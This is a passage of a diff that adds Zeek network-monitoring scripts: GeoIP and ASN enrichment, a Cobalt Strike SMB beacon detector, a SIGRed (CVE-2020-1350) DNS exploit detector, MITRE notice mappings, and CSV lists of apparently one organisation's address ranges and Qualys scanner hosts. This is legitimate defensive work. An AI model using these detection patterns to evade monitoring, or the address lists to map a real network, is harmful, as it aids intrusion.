\x5E\xAB\xFA\xEE\xAD\x1D\x5E\x85\x8B\xEA\xB0\xB2\xC6\x30\x0C\x06\x03\x55\x1D\x13\x04\x05\x30\x03\x01\x01\xFF\x30\x19\x06\x09\x2A\x86\x48\x86\xF6\x7D\x07\x41\x00\x04\x0C\x30\x0A\x1B\x04\x56\x34\x2E\x30\x03\x02\x04\x90\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x01\x05\x05\x00\x03\x81\x81\x00\xC8\xC7\x96\x99\x58\x75\xF5\xE2\xBB\x07\x77\x21\xA1\x01\x60\x10\x3E\xB0\xA3\xDE\xF8\xC4\x24\x56\x87\x8F\x5E\x71\x25\x86\x9A\x08\xA0\x96\x2F\xB9\x0F\xF3\x06\xBE\xDA\x35\x82\xDF\xC2\xF2\xB8\xA1\x8B\x01\x78\xEA\xDD\x7F\x81\x6D\x73\x32\x99\x17\x8C\x6F\x13\x39\x29\xEE\xB6\x45\xAF\xD9\xC9\xF0\x49\x1B\x9C\x2B\x65\xA4\x82\xD3\xE5\x29\x97\xB5\x7D\x0B\xDF\xF5\x2A\x49\xF0\x00\x11\x4D\x79\x00\xC8\xCA\xD9\xBA\x9A\xF7\xAA\xB3\x2F\xB4\xEF\x9E\x05\x0A\xF5\xAC\x7E\xD0\x96\x22\x92\xB3\x67\x0F\x5F\x38\xA0\xB8\xDF\xA5\xB5\x19"
+};
--- a/capitalone/enrichments/asn-conn.zeek
+++ b/capitalone/enrichments/asn-conn.zeek
@ -0,0 +1,33 @@
+# Sourced from https://threathuntingtails.com/zeek-asn-enrichment/
+
+@load base/utils/site
+
+
+export {
+
+
+     redef record Conn::Info += {
+
+         orig_h_asn: geo_autonomous_system &log &optional;
+         resp_h_asn: geo_autonomous_system &log &optional;
+
+     };
+
+}
+
+
+event connection_state_remove(c: connection) &priority=0
+{
+
+      local orig: addr = c$conn$id$orig_h;
+      if ( !Site::is_private_addr(orig)){
+
+            c$conn$orig_h_asn = lookup_autonomous_system(orig);
+      }
+      local resp: addr = c$conn$id$resp_h;
+      if ( !Site::is_private_addr(resp)){
+
+            c$conn$resp_h_asn = lookup_autonomous_system(resp);
+      }
+
+}
--- a/capitalone/enrichments/geoip-conn.zeek
+++ b/capitalone/enrichments/geoip-conn.zeek
@ -0,0 +1,80 @@
+##! Populate geolocation fields in the connection logs.
+##! This package includes GeoLite2 data created by MaxMind, available from
+##! https://www.maxmind.com
+
+module Conn;
+
+# The following redef ensuers the .mmdb included with this package is used
+# out-of-the-box. If you delete that file, Zeek will fall back to looking in
+# default locations. See this link for paths:
+#
+# https://github.com/zeek/zeek/blob/09483619ef0839cad189f22c4d5be3d66cedcf55/src/zeek.bif#L3964-L3971
+
+redef mmdb_dir = @DIR;
+
+export {
+	type GeoInfo: record {
+		country_code: string &optional &log;
+		region: string &optional &log;
+		city: string &optional &log;
+		latitude: double &optional &log;
+		longitude: double &optional &log;
+		as_number: count &optional &log;
+		as_org: string &optional &log;
+	};
+
+	type GeoPair: record {
+		orig: GeoInfo &optional &log;
+		resp: GeoInfo &optional &log;
+	};
+
+	redef record Conn::Info += {
+		geo: GeoPair &optional &log;
+	};
+}
+
+event connection_state_remove(c: connection) 
+	{
+	local orig_geo: GeoInfo;
+	local orig_loc = lookup_location(c$id$orig_h);
+	if ( orig_loc?$country_code )
+		orig_geo$country_code = orig_loc$country_code;
+	if ( orig_loc?$region )
+		orig_geo$region = orig_loc$region;
+	if ( orig_loc?$city )
+		orig_geo$city = orig_loc$city;
+	if ( orig_loc?$latitude )
+		orig_geo$latitude = orig_loc$latitude;
+	if ( orig_loc?$longitude )
+		orig_geo$longitude = orig_loc$longitude;
+	local orig_as_info = lookup_autonomous_system(c$id$orig_h);
+	if ( orig_as_info?$number )
+		orig_geo$as_number = orig_as_info$number;
+	if ( orig_as_info?$organization )
+		orig_geo$as_org = orig_as_info$organization;
+
+	local resp_geo: GeoInfo;
+	local resp_loc = lookup_location(c$id$resp_h);
+	if ( resp_loc?$country_code )
+		resp_geo$country_code = resp_loc$country_code;
+	if ( resp_loc?$region )
+		resp_geo$region = resp_loc$region;
+	if ( resp_loc?$city )
+		resp_geo$city = resp_loc$city;
+	if ( resp_loc?$latitude )
+		resp_geo$latitude = resp_loc$latitude;
+	if ( resp_loc?$longitude )
+		resp_geo$longitude = resp_loc$longitude;
+	local resp_as_info = lookup_autonomous_system(c$id$resp_h);
+	if ( resp_as_info?$number )
+		resp_geo$as_number = resp_as_info$number;
+	if ( resp_as_info?$organization )
+		resp_geo$as_org = resp_as_info$organization;
+
+	local geo_pair: GeoPair;
+	geo_pair$orig = orig_geo;
+	geo_pair$resp = resp_geo;
+
+	c$conn$geo = geo_pair;
+
+	}
--- a/capitalone/enrichments/mozilla-ca-list-11-14-2018.zeek
+++ b/capitalone/enrichments/mozilla-ca-list-11-14-2018.zeek
--- a/capitalone/enrichments/smb_beacon.zeek
+++ b/capitalone/enrichments/smb_beacon.zeek
@ -0,0 +1,173 @@
+@load base/protocols/smb
+
+module Cobaltstrike;
+
+
+export {
+    # Number of times to match pattern before logging
+    const beacon_iterations: count = 4 &redef;
+    # Max size of read/write to track
+    const hb_len_limit = 25; 
+}
+
+export {
+	redef enum Notice::Type +=
+	{
+        C1::Beacon_Activity
+    };
+}
+
+
+# start with buffer overflow response
+event smb2_message(c: connection, hdr: SMB2::Header, is_orig: bool) {
+    if (c$smb_state$current_cmd$command == "IOCTL" && c$smb_state$current_cmd?$status) {
+        if (c$smb_state$current_cmd$status == "BUFFER_OVERFLOW") {
+            SumStats::observe("cs_smb",
+                      SumStats::Key($host=c$id$orig_h,
+                                     $str=cat_sep($sep="|",
+                                     $def="NULL",
+                                     c$id$orig_p,
+                                     c$id$resp_h,
+                                     c$id$resp_p)),
+                      SumStats::Observation($num=0,
+                        $str=cat_sep($sep="|", $def="NULL", "buffer_overflow")));
+            }
+        }
+    }
+
+
+
+event smb2_read_request(c: connection, hdr: SMB2::Header, file_id: SMB2::GUID, offset: count, length: count) {
+    # if tagged, mark size 
+        SumStats::observe("cs_smb",
+                  SumStats::Key($host=c$id$orig_h,
+                                 $str=cat_sep($sep="|",
+                                 $def="NULL",
+                                 c$id$orig_p,
+                                 c$id$resp_h,
+                                 c$id$resp_p)),
+                  SumStats::Observation($num=length, 
+                    $str=cat_sep($sep="|", $def="NULL", "read", length)));
+    }
+
+event smb2_write_request(c: connection, hdr: SMB2::Header, file_id: SMB2::GUID, offset: count, length: count) {
+
+    if (length < hb_len_limit) {
+        SumStats::observe("cs_smb",
+                      SumStats::Key($host=c$id$orig_h,
+                                     $str=cat_sep($sep="|",
+                                     $def="NULL",
+                                     c$id$orig_p,
+                                     c$id$resp_h,
+                                     c$id$resp_p)),
+                      SumStats::Observation($num=length,
+                        $str=cat_sep($sep="|", $def="NULL", "write", length)));
+                      }
+}
+
+function thresh_crossed(key:SumStats::Key, result:SumStats::Result)
+{
+
+    local r = result["cs_smb"];
+    #unpack our key 0: orig_p, 1: resp_h, 2: resp_p
+    local keys = split_string($str = key$str, $re=/\|/);
+  
+    # note data_len is a str now because of pack/unpack
+    #local s = fmt("Possible SMB Beacon traffic: observered %.0f writes of data length %s", r$sum, keys[2]);
+    local s = fmt("Potential Cobalt Strike SMB Beacon Activity.");
+    print fmt(s);
+    local cid: conn_id = [$orig_h = key$host,
+                         $orig_p = to_port(keys[0]),
+                         $resp_h = to_addr(keys[1]),
+                         $resp_p = to_port(keys[2])];
+    
+    # TODO: error check this
+    local conn = lookup_connection(cid);
+    # Raise Notice
+    NOTICE([$note=C1::Beacon_Activity,
+            $msg=s,
+            #$src=key$host,
+            #$dst=to_addr(keys[0]),
+            #$identifier=key$str,
+            $conn = conn,
+            $suppress_for=30min]);
+
+    SumStats::next_epoch("CS_SMB_Beacon");
+}
+
+function check_beacon(key: SumStats::Key, result: SumStats::Result): double {   
+    local cmds = vector("read" ,"write", "buffer_overflow");
+    local mark: int = -1;
+    local len: count = 0;
+    local r_vec = SumStats::get_last(result["cs_smb"]);
+    for (i in r_vec)
+    {
+        local keys = split_string($str = r_vec[i]$str,  $re=/\|/);
+        if (mark == -1)
+        {
+            for (j in cmds)
+            {
+                if (keys[0] == cmds[j])
+                {
+                    # keep track of where we are in the sequence
+                    mark = j;
+                    # get out of this loop
+                    break;
+                }
+            }
+        }
+        # mark is set if first cmd write or read
+        if (len == 0 && r_vec[i]$num != 0)
+        {
+            len = r_vec[i]$num;
+        }
+        # len is set
+        if (keys[0] == cmds[mark])
+        {
+            if(cmds[mark] == "read" || cmds[mark] == "write")
+            {   
+                if(len != r_vec[i]$num)
+                {
+                    return 1.0;
+                }
+            }
+            else
+            {
+                if (cmds[mark] != "buffer_overflow")
+                {
+                    #print fmt("cmd: %s\t\tvec: %s",cmds[mark], keys[0]);
+                    return 1.0;
+                }
+            }
+        }
+        else
+        {
+            return 1.0;
+        }
+        
+        # move mark up
+        mark = (mark + 1) % 3;
+
+    }
+
+    # winner, fit the pattern all the same length
+    return 3.0;
+}
+
+event zeek_init()
+{
+
+    local r1 = SumStats::Reducer($stream="cs_smb", 
+                                 $apply=set(SumStats::LAST),
+                                 $num_last_elements = beacon_iterations * 3
+                                 );
+
+    
+    SumStats::create([$name = "CS_SMB_Beacon",
+                      $epoch = 0secs, #manual epochs
+                      $reducers = set(r1),
+                      $threshold = 2.0,
+                      $threshold_val = check_beacon,
+                      $threshold_crossed = thresh_crossed
+                       ]);
+}
--- a/capitalone/extensions/.DS_Store
+++ b/capitalone/extensions/.DS_Store
--- a/capitalone/extensions/load.zeek
+++ b/capitalone/extensions/load.zeek
@ -0,0 +1,3 @@
+@load ./log_extensions
+@load ./mitre
+@load ./ip_to_application
--- a/capitalone/extensions/ip_to_application/load.zeek
+++ b/capitalone/extensions/ip_to_application/load.zeek
@ -0,0 +1 @@
+@load ./main
--- a/capitalone/extensions/ip_to_application/ip-homenet.csv
+++ b/capitalone/extensions/ip_to_application/ip-homenet.csv
@ -0,0 +1,33 @@
+#fields	cidr
+192.168.0.0/16
+10.0.0.0/8
+172.16.0.0/12
+12.5.144.0/24
+63.86.70.20/30
+63.86.70.28/30
+63.95.36.0/24
+63.111.163.0/24
+63.113.210.0/24
+63.165.133.0/24
+63.233.142.0/24
+64.211.169.0/24
+65.208.18.0/29
+65.210.174.16/30
+65.212.200.224/32
+65.242.71.132/30
+68.136.206.224/30
+152.192.39.12/30
+199.15.188.0/22
+199.244.214.0/23
+199.244.216.0/22
+204.63.32.0/19
+206.57.14.0/24
+206.107.165.0/24
+206.132.124.96/28
+207.13.113.128/28
+207.242.16.0/28
+207.242.80.0/23
+207.243.136.0/28
+208.66.216.0/22
+208.80.48.0/22
+217.169.160.0/20
--- a/capitalone/extensions/ip_to_application/ip-to-application.csv
+++ b/capitalone/extensions/ip_to_application/ip-to-application.csv
@ -0,0 +1,106 @@
+#fields	range	application
+10.102.128.53/32	qualys
+10.105.128.53/32	qualys
+10.12.204.99/32	qualys
+10.122.0.12/32	qualys
+10.122.0.26/32	qualys
+10.122.91.62/32	qualys
+10.122.91.71/32	qualys
+10.123.0.36/32	qualys
+10.123.0.60/32	qualys
+10.123.82.45/32	qualys
+10.123.82.57/32	qualys
+10.125.103.14/32	qualys
+10.125.103.25/32	qualys
+10.13.65.98/32	qualys
+10.13.65.99/32	qualys
+10.14.136.91/32	qualys
+10.14.149.35/32	qualys
+10.14.230.89/32	qualys
+10.14.246.94/32	qualys
+10.14.48.42/32	qualys
+10.14.48.43/32	qualys
+10.14.48.44/32	qualys
+10.15.104.20/32	qualys
+10.15.195.26/32	qualys
+10.15.21.33/32	qualys
+10.15.232.35/32	qualys
+10.15.80.48/32	qualys
+10.160.3.127/32	qualys
+10.165.2.124/32	qualys
+10.170.2.250/32	qualys
+10.171.2.89/32	qualys
+10.184.4.10/32	qualys
+10.184.4.12/32	qualys
+10.184.4.14/32	qualys
+10.184.4.4/32	qualys
+10.184.4.6/32	qualys
+10.184.4.7/32	qualys
+10.184.4.9/32	qualys
+10.187.13.37/32	qualys
+10.187.13.41/32	qualys
+10.187.13.44/32	qualys
+10.187.13.46/32	qualys
+10.200.0.244/32	qualys
+10.200.0.246/32	qualys
+10.200.0.247/32	qualys
+10.200.0.248/32	qualys
+10.200.0.249/32	qualys
+10.200.0.253/32	qualys
+10.200.1.20/32	qualys
+10.200.1.28/32	qualys
+10.203.63.37/32	qualys
+10.203.63.40/32	qualys
+10.203.63.42/32	qualys
+10.203.63.45/32	qualys
+10.203.63.46/32	qualys
+10.203.63.54/32	qualys
+10.203.63.56/32	qualys
+10.203.63.62/32	qualys
+10.205.62.235/32	qualys
+10.205.63.231/32	qualys
+10.205.63.238/32	qualys
+10.24.136.18/32	qualys
+10.24.149.17/32	qualys
+10.24.230.18/32	qualys
+10.24.246.17/32	qualys
+10.24.45.46/32	qualys
+10.24.45.47/32	qualys
+10.24.45.48/32	qualys
+10.25.104.18/32	qualys
+10.25.165.29/32	qualys
+10.25.195.31/32	qualys
+10.25.232.18/32	qualys
+10.25.5.19/32	qualys
+10.25.80.250/32	qualys
+10.26.65.252/32	qualys
+10.26.65.253/32	qualys
+10.27.44.18/32	qualys
+10.31.118.203/32	qualys
+10.31.118.220/32	qualys
+10.37.102.51/32	qualys
+10.37.136.67/32	qualys
+10.37.227.95/32	qualys
+10.37.6.208/32	qualys
+10.37.7.1/32	qualys
+10.37.7.2/32	qualys
+10.37.7.3/32	qualys
+10.37.98.110/32	qualys
+10.42.131.11/32	qualys
+10.42.68.15/32	qualys
+10.8.142.248/32	qualys
+10.8.147.248/32	qualys
+10.8.150.36/32	qualys
+172.16.0.58/32	qualys
+172.22.130.201/32	qualys
+172.22.141.13/32	qualys
+172.22.145.28/32	qualys
+172.22.155.50/32	qualys
+172.22.158.50/32	qualys
+172.22.159.70/32	qualys
+172.22.181.63/32	qualys
+172.22.72.80/32	qualys
+217.169.161.200/32	qualys
+217.169.165.163/32	qualys
+217.169.166.113/32	qualys
+64.39.96.0/20	qualys
--- a/capitalone/extensions/ip_to_application/main.zeek
+++ b/capitalone/extensions/ip_to_application/main.zeek
@ -0,0 +1,69 @@
+# Who               When            What
+# -----------------------------------------------------------------------------
+# Aaron Eppert      02/20/2019      Initial commit
+# Aaron Eppert      04/22/2019      Change from 'addr' to 'subnet' to allow CIDR block inclusion trivially
+#                                   Note: Individual IPv4 entries necessitate a /32 moving forward
+#
+
+@load base/protocols/conn
+@load base/protocols/ssl
+
+module IP_TO_APP;
+
+export {
+    type Val: record {
+        range: subnet;
+        application: string &optional;
+    };
+
+    type Cidr: record {
+        cidr: subnet;
+    };
+    
+    global ipToAppTbl: table[subnet] of string = table();
+    global ipHomeNetSet: set[subnet] = set();
+
+    const ip_to_application = @DIR + "/ip-to-application.csv" &redef;
+    const ip_homenet = @DIR + "/ip-homenet.csv" &redef;
+}
+
+redef record Conn::Info$application += { &log };
+
+
+event ipToApp_event(description: Input::EventDescription, t: Input::Event, data: Val) {
+    ipToAppTbl[data$range] = data$application;
+}
+
+event ipHomenet_event(description: Input::EventDescription, t: Input::Event, data: Cidr) {
+    add ipHomeNetSet[data$cidr];
+}
+
+
+event zeek_init() &priority=-11
+{
+    Input::add_event([$source=ip_to_application,
+                      $name="ipToApp",
+                      $fields=Val,
+                      $ev=ipToApp_event,
+                      $mode=Input::REREAD]);
+
+    Input::add_event([$source=ip_homenet,
+                      $name="ipHomenet",
+                      $fields=Cidr,
+                      $ev=ipHomenet_event,
+                      $mode=Input::REREAD]);
+}
+
+event connection_state_remove(c: connection) &priority=-4
+{
+     if(c$conn?$application) {
+         if(c$id$resp_h in ipToAppTbl) {
+             c$conn$application = ipToAppTbl[c$conn$id$resp_h];
+         }
+
+         if(c$id$orig_h in ipToAppTbl) {
+             c$conn$application = ipToAppTbl[c$conn$id$orig_h];
+         }
+
+     }
+}
--- a/capitalone/extensions/log_extensions/load.zeek
+++ b/capitalone/extensions/log_extensions/load.zeek
@ -0,0 +1,2 @@
+@load ./conn_extension
+
--- a/capitalone/extensions/log_extensions/conn_extension.zeek
+++ b/capitalone/extensions/log_extensions/conn_extension.zeek
@ -0,0 +1,5 @@
+
+redef record Conn::Info += {
+    ## Decorate conn.log with application specifics where available
+    application: string &log &optional;
+};
--- a/capitalone/extensions/mitre/load.zeek
+++ b/capitalone/extensions/mitre/load.zeek
@ -0,0 +1 @@
+@load ./main
--- a/capitalone/extensions/mitre/main.zeek
+++ b/capitalone/extensions/mitre/main.zeek
@ -0,0 +1,41 @@
+module MITRE_IN_NOTICES;
+
+export {
+    type Val: record {
+        id: string;
+        label: string;
+    };
+
+    type Idx: record {
+        observable: string;
+    };
+
+    global observableToKillchain: table[string] of Val = table();
+
+	const killchain_file = @DIR + "/notice-to-mitre.csv" &redef;
+  
+    redef record Notice::Info += {
+        killchain_id: string &log &optional;
+        killchain_stage: string &log &optional;
+    };
+}
+
+event zeek_init() {
+    Input::add_table([$source=killchain_file, 
+                      $name="mitre_file", 
+                      $idx=Idx, 
+                      $val=Val, 
+                      $destination=MITRE_IN_NOTICES::observableToKillchain, 
+                      $mode=Input::REREAD]);
+}
+
+hook Notice::policy(n: Notice::Info) 
+{
+    local k: MITRE_IN_NOTICES::Idx = [$observable=fmt("notice::%s", n$note)];
+
+    if (k$observable in MITRE_IN_NOTICES::observableToKillchain) {
+        local v = MITRE_IN_NOTICES::observableToKillchain[k$observable];
+        n$killchain_id = v$id;
+        n$killchain_stage = v$label;
+    }
+}
--- a/capitalone/extensions/mitre/notice-to-mitre.csv
+++ b/capitalone/extensions/mitre/notice-to-mitre.csv
@ -0,0 +1,45 @@
+#fields	observable	id	label
+notice::DNS::External_Name	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Signatures::Multiple_Signatures	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::FTP::Site_Exec_Success	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Signatures::Sensitive_Signature	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SSL::Old_Version	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SSL::Certificate_Expires_Soon	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Software::Vulnerable_Version	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::ProtocolDetector::Server_Found	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SSL::Invalid_Ocsp_Response	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Scan::Port_Scan	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Signatures::Multiple_Sig_Responders	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Scan::Address_Scan	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::FTP::Bruteforcing	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Heartbleed::SSL_Heartbeat_Odd_Length	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Weird::Activity	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::PacketFilter::Too_Long_To_Compile_Filter	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Heartbleed::SSL_Heartbeat_Attack	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::HTTP::SQL_Injection_Attacker	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SMTP::Blocklist_Blocked_Host	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SSL::Certificate_Expired	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::HTTP::SQL_Injection_Victim	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SSH::Interesting_Hostname_Login	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Software::Software_Version_Change	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Conn::Retransmission_Inconsistency	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SSH::Login_By_Password_Guesser	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::ProtocolDetector::Protocol_Found	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::TeamCymruMalwareHashRegistry::Match	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Heartbleed::SSL_Heartbeat_Attack_Success	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Signatures::Signature_Summary	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+intel::Intel::ADDR::Known Tor Server	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SMTP::Blocklist_Error_Message	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SSH::Watched_Country_Login	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::CaptureLoss::Too_Much_Loss	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SSH::Password_Guessing	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Traceroute::Detected	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Intel::Notice	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Heartbleed::SSL_Heartbeat_Many_Requests	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::PacketFilter::Install_Failure	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::Signatures::Count_Signature	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SSL::Weak_Cipher	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SMTP::Suspicious_Origination	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SSL::Weak_Key	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SSL::Invalid_Server_Cert	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
+notice::SSL::Certificate_Not_Valid_Yet	mitre:TTP-83610d07-0683-42a1-83f1-8683f294eca8	Discovery
--- a/capitalone/external/.DS_Store
+++ b/capitalone/external/.DS_Store
--- a/capitalone/external/CVE-2020-1350/CVE-2020-1350.zeek
+++ b/capitalone/external/CVE-2020-1350/CVE-2020-1350.zeek
@ -0,0 +1,76 @@
+module CVE_2020_1350;
+# This script raises notices relating to the CVE-2020-1350 (AKA SIGRed)
+# affecting Windows DNS Server with a CVE score of 10.0
+# Tested on zeek 3.2.0-dev.459
+# Authors: Ben Reardon, Research Team @Corelight. ben.reardon@corelight.com, @benreardon
+#          Ryan Victory, Applications Team Manager @Corelight. ryan.victory@corelight.com @beerandraptors
+#
+# Version: 0.30
+export {
+    redef enum Notice::Type += {
+        CVE_2020_1350_Detected_High_Confidence,
+        CVE_2020_1350_Potential
+    };
+    global AXFR_cuid: table[string] of count &default=0 &write_expire=1hr;
+    # Change this to T to only monitor for the High Fidelilty SIG exploit.
+    option only_enable_high_fidelity_notice: bool = F;
+}
+# A list of DNS Record types: https://en.wikipedia.org/wiki/List_of_DNS_record_types
+# While the primary known attack vector involves the SIG query type,
+# at this stage of development let's select query types that are associated with signatures 
+# as these are more likely to be parsed by vulnerable function. SIG, KEY, TKEY and RRSIG
+
+# Function to take a dns event and look for indicators of the CVE-2020-1350 exploit
+function handle_dns_event(c: connection, ans: dns_answer) 
+    {
+    # If the connection is a non primary packet of an AXFR, just return
+    # because these packets are often large by design.
+    if (c$uid in AXFR_cuid)
+        return;
+
+    if (c$resp$size >= 65258)
+        {
+        local notice_type = CVE_2020_1350_Potential;
+        local message = "Potential CVE-2020-1350 Windows DNS exploit (CVE10) has been detected (large DNS response).  Refer to links:  https://cve.mitre.org/cgi-bin/cvename.cgi?name=ALAS-2020-1350 and https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/";
+        if (ans$qtype == 24 || ans$qtype == 25) # SIG/KEY query code and a large response, high confidence!
+            {
+            notice_type = CVE_2020_1350_Detected_High_Confidence;
+            message = "CVE-2020-1350 Windows DNS exploit (CVE10) has been detected (High Confidence, large SIG/KEY response).  Refer to links:  https://cve.mitre.org/cgi-bin/cvename.cgi?name=ALAS-2020-1350 and https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/";
+            }
+        else if (!only_enable_high_fidelity_notice &&
+                 ans$qtype == 46 || ans$qtype == 249) # RRSIG/TKEY
+            {
+            message = "Potential CVE-2020-1350 Windows DNS exploit (CVE10) has been detected (large DNS RRSIG/TKEY response).  Refer to links:  https://cve.mitre.org/cgi-bin/cvename.cgi?name=ALAS-2020-1350 and https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/";
+            }
+        if (only_enable_high_fidelity_notice && /^Potential/ in message)
+            return;
+
+        NOTICE([$note=notice_type,
+                $conn=c,
+                $identifier=cat(c$id$orig_h,c$id$resp_h),
+                $msg=message,
+                $suppress_for=1 hr]);
+        }
+    }
+# RRSIG (qtype == 46) currently has it's own zeek event and wouldn't trigger the dns_unknown_reply event
+event dns_RRSIG(c: connection, msg: dns_msg, ans: dns_answer, rrsig: dns_rrsig_rr)
+    {
+    handle_dns_event(c, ans);
+    }
+# SIG (qtype == 24), KEY (qtype == 25), TKEY (qtype == 249) do not have their own event and so should be parsed by the catch-all event 
+event dns_unknown_reply(c: connection, msg: dns_msg, ans: dns_answer)
+    {
+    handle_dns_event(c, ans);
+    }
+
+# We only want to run the dns_request event when the medium fidelity 
+# notices are required, as this may be an expensive event
+@if (!only_enable_high_fidelity_notice)
+    event dns_request(c: connection, msg: dns_msg, query: string, qtype: count, qclass: count)
+        {
+        # A guardrail for query types Zone transfer types AXFR(252) 
+        # that may legitimately exceed the size limit
+        if (qtype == 252)
+            ++AXFR_cuid[c$uid];
+        }
+@endif
--- a/capitalone/external/CVE-2020-1350/LICENSE
+++ b/capitalone/external/CVE-2020-1350/LICENSE
@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2020, Corelight, Inc.
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its
+   contributors may be used to endorse or promote products derived from
+   this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
--- a/capitalone/external/CVE-2020-1350/README.md
+++ b/capitalone/external/CVE-2020-1350/README.md
@ -0,0 +1,17 @@
+# CVE-2020-1350 (AKA SIGRed) v0.21
+
+## Summary:  
+A Zeek package for detection of attempts to exploit Microsoft Windows DNS server via CVE-2020-1350 (AKA SIGRed - CVE Score of 10.0)
+
+## References: 
+https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/     
+https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350  
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=ALAS-2020-1350  
+
+## Notices raised :   
+
+| Notice | Fidelity  |
+| -------- | ---------------------- |
+|Potential CVE-2020-1350 Windows DNS exploit (CVE10) has been detected (large DNS response).  Refer to links:  https://cve.mitre.org/cgi-bin/cvename.cgi?name=ALAS-2020-1350 and https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/|Medium|
+|CVE-2020-1350 Windows DNS exploit (CVE10) has been detected (High Confidence, large SIG/KEY response).  Refer to links:  https://cve.mitre.org/cgi-bin/cvename.cgi?name=ALAS-2020-1350 and https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/|High|
